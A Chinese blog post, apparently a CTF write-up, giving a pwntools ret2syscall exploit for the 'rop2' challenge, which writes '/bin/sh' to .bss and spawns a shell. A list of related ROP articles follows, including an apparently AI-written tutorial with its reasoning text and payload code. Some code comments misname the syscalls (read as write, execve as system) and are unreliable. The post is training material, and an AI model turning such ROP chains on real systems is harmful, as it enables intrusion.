ROP2 ROP的启蒙题

最新推荐文章于 2019-12-21 20:25:34 发布
最新推荐文章于 2019-12-21 20:25:34 发布
阅读量457 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/81431600 
from pwn import *
cn = remote('hackme.inndy.tw',7703)
#context.log_level='debug'
elf = ELF('rop2')

syscall = elf.symbols['syscall']
print "%x"%syscall
over = elf.symbols['overflow']
bss = elf.bss()
cn.recvuntil('Give me your ropchain:')
pay = 'a'*16
pay+= p32(syscall)#ret_addr
pay+= p32(over)#fake_ret_addr
pay+= p32(3)+p32(0)+p32(bss)+p32(8)#param
#syscall(3,0,bss,8)=write(0,bss,8)
#先往bss写入/bin/sh
cn.sendline(pay)
cn.send('/bin/sh\0')

pay='a'*16
pay+= p32(syscall)#ret_addr
pay+= 'a'*4#fake_ret_addr
pay+= p32(11)+p32(bss)+p32(0)+p32(0)#param
#syscall(11,bss,0,0)=system(bss)
cn.sendline(pay)

cn.interactive()

padding+返回地址+执行完syscall后的返回地址+参数

ROP链-BUUCTF-inndy_rop(ret2syscall)
Welcome To Myon'Blog !
05-08 546
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
ROP和Ret2libc漏洞
qq_67812668的博客
08-12 1198
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习 可用于练习基础的ROP
rop and rop2 wp
zszcr的博客
04-02 570
目来源:国外的一个ctf平台https://hackme.inndy.tw/ rop目提示:ROP buffer overflow 很明显是一个栈溢出 要用rop来获取shell防护机制发现至开启了NX 拖到IDA反编译一下 可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接我们可以通过ROPgadget 来直接构造ropchain命令为 ROPgadget --binary...
SetROP2
I am a coder
03-25 3849
<br />CDC::SetROP2<br />int SetROP2(int nDrawMode);<br />返回值:绘图模式的前一次取值。可以取联机文档“Windows SDK”中提供的任意值。<br />参数: nDrawMode 指定新的绘制模式,可以为下列值之一:<br />· R2_BLACK 像素始终为黑色。  <br />· R2_WHITE 像素始终为白色。  <br />· R2_NOP 像素保持不变。  <br />· R2_NOT 像素为屏幕颜色的反色。  <br />· R2_C
rop2
weixin_30713953的博客
06-04 133
根据nDrawMode设置的方式重新设定绘图的方式,下面就不同的nDrawMode值具体解释绘图模式是如何改变的。   首先就nDrawMode的取值有以下的情况:    1、R2_BLACKPixel is always black. //所有绘制出来的像素为黑色   2、R2_WHITEPixel is always white. //所有绘制出来的像素为白色    3、R2_NOPPi...
pwn-ROP(2)
aitangdao4981的博客
06-13 157
通过int80系统只对静态编译有效,动态编译需要用其他方法 本提供了一个地址输入端,输入函数地址会返回该函数的实际地址,我们用得到的实际地址-偏移地址=基地址,然后用基地址+任意函数的偏移地址就可以得到实际地址,就可以调用gets、system等函数,利用溢出点传入shell。 首先,用objdump看一下用到的puts函数的跳转地址 exp中先传入0x804a01...
hackme.inndy.tw的rop2
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2目如果网站被墙或者关闭请从这里下载
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
pwn --rop
Vccxx的博客
04-08 2128
rop练习—Very Secure Systemrop 真爽。。目链接:http://pan.baidu.com/s/1eSd0XTg 注:.bak是原,原有个过10s自动退出程序的设置,不好调试,我用ida打了个patch,就是另一个文件,两个文件只有这一个区别漏洞分析:这个程序是静态加载的,所以got表没有用,顺带dynelf也不行,也没提供libc。但是有一个函数可以溢出,但是只溢出了
pwn学习资料整理——ROP技术(pwn_rop2
08-30
pwn学习资料整理——ROP技术(pwn_rop2
[pwn]ROP:三道讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
roprop2目的wp
一个码农的笔记
10-17 4727
https://hackme.inndy.tw/scoreboard/ 目很有趣,我做了roprop2这两个目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
hackme pwn rop2 [syscall + rop]
ACdream
02-05 600
先checksec一下: 有个大概思路:rop过NX main中和overflow函数里都有syscall函数,如下: 观察到这里有缓冲区溢出!"A" * 0xC! 先来学习syscall函数: syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询: cat -n /usr/include/x86_64-linux-gnu/...
pwn——rop练习
sjt670994562的博客
09-17 690
hackme——ROP2 这道用了一个比较新的方法,去寻找栈溢出的点,他用了syscall调用的相关函数,其中参数的第一位代表序号既调用的哪一个函数,我们称为syscall table调用号,这里4是write 3是read 这里我们用到了 locate unistd_32 这里有大佬的文章 https://blog.csdn.net/mydo/article/details/44997901...
PWN 学习—某平台ROP2 writeup
SNAKEのBlog
08-01 553
64位栈帧学习 writeup 本能反应 RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 NX:NX enabl...
Windows16种二元光栅操作(ROP2)运算方式
hopyGreat的博客
01-02 3234
本文参考自 《Windows程序设计(第5版,珍藏版)》显示器上所显示的线条外观受定义在设备环境中的绘图模式影响。画一条直线,其颜色由画笔的颜色和画线显示区域的颜色共同确定。当Windows使用一个画笔绘制直线时, 它实际上是在将画笔的像素颜色和目标显示表面的像素颜色按位进行布尔运算。对像素颜色执行一个按位布尔运算称为“光栅操作”(raster operation, ROP),简称ROP。因为绘制
ROP Emporium一系列
weixin_44296844的博客
12-21 609
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
rop入门解法
最新发布
10-22
<think>嗯,用户这次明确提出了ROP入门解法的需求。从引用内容看,用户应该是在学习PWN技术中的栈溢出和ROP攻击基础,而且提到的几个引用都涉及关键知识点:栈迁移绕过NX保护、异或指令绕过badchar、寄存器控制gadget查找、地址泄漏处理等。 用户可能刚接触二进制安全,需要从最基础的ROP链构造逻辑开始梳理。虽然引用里有不少术语,但用户特意强调"入门解法",说明需要基础性引导。我注意到引用[3]提到pop rdi寄存器的查找方法,引用[4]强调地址转换,这些都是新手容易出错的点。 上次回答已经搭建了ROP攻击的框架,这次要更聚焦"入门实践"环节。把攻击流程拆解成:1)确认漏洞点→2)泄漏地址→3)寻找gadget→4)构造payload→5)绕过防护措施。特别要强调工具链使用,比如ROPgadget和pwntools的操作细节,因为引用[3][4]显示用户正在实践这部分。 用户提到的badchar绕过(引用[2])和栈迁移(引用[1])属于进阶技巧,但既然是入门需求,应该放在最后简要说明作为延伸。核心还是要让用户理解最基本的ret2libc攻击模型——毕竟所有ROP都是基于这个思想衍生的。 啊,想到个重点:必须提醒内存地址对齐问。引用[4]的int(buf,16)转换容易出错,很多新手会忽略小端序处理和地址偏移计算,这会导致payload发送失败。应该在步骤里单独强调,最好配上示意图解释栈帧布局。 </think>以下是ROP入门的解法详解,结合栈溢出漏洞利用的核心步骤: --- ### **ROP攻击基本原理** ROP(Return-Oriented Programming)是一种绕过内存不可执行(NX/DEP)防护的技术。核心思想是复用程序中已有的代码片段(gadget),通过控制栈指针(`rsp`)跳转执行多个gadget链,最终实现攻击目标[^1]。 --- ### **ROP入门解法步骤** #### **1. 确定漏洞点** - 通过缓冲区溢出覆盖返回地址(ret),劫持程序控制流。 - 输入模式示例:`payload = b'A'*offset + p64(gadget_addr)` (`offset`为溢出点到ret的偏移,`p64`用于地址打包)[^4]。 #### **2. 泄漏关键地址** - **场景**:需获取函数真实地址(如`libc`基址)。 - **方法**: - 调用`puts@plt`泄漏`puts@got`地址: ```python pop_rdi = 0x400703 # 控制rdi寄存器的gadget payload = b'A'*offset + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) ``` - 接收输出并计算`libc`基址: `libc_base = leaked_puts - libc.symbols['puts']`[^3][^4]。 #### **3. 构造ROP链** - **查找gadget**:使用工具定位关键指令: ```bash ROPgadget --binary vuln_prog --only 'pop|ret' | grep 'rdi' # 输出示例: 0x400703: pop rdi; ret; ``` - **常用gadget类型**: - 控制参数寄存器:`pop rdi; ret`, `pop rsi; ret` - 内存操作:`mov [rax], rdx; ret` - 系统调用:`syscall; ret`[^2][^3]. #### **4. 绕过防护机制** - **Bad Characters处理**(如`b'i/c'`): - 使用异或指令避免敏感字符: ```asm xor_byte_gadget: # 示例gadget xor byte [rax], bl ret ``` - 分步异或写入目标值(如`shellcode`)[^2]。 - **栈空间不足时**:通过`栈迁移`转移到可控区域(如BSS段): ```python leave_ret = 0x400801 # leave; ret; gadget payload = b'A'*offset + p64(pop_rbp) + p64(new_stack) + p64(leave_ret) ``` #### **5. 最终执行** - 调用`system("/bin/sh")`或`execve`: ```python binsh_addr = 0x601080 # 写入"/bin/sh"的地址 payload += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) ``` --- ### **关键工具与技巧** 1. **动态调试**:`gdb-pwndbg`查看栈布局,`cyclic`计算偏移。 2. **地址转换**:接收泄漏地址时需转换:`leak = u64(p.recv(6).ljust(8, b'\x00'))`[^4]。 3. **Libc查询**:利用`LibcSearcher`匹配远程libc版本: ```python from libcsearcher import LibcSearcher libc = LibcSearcher("puts", leak_addr) ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值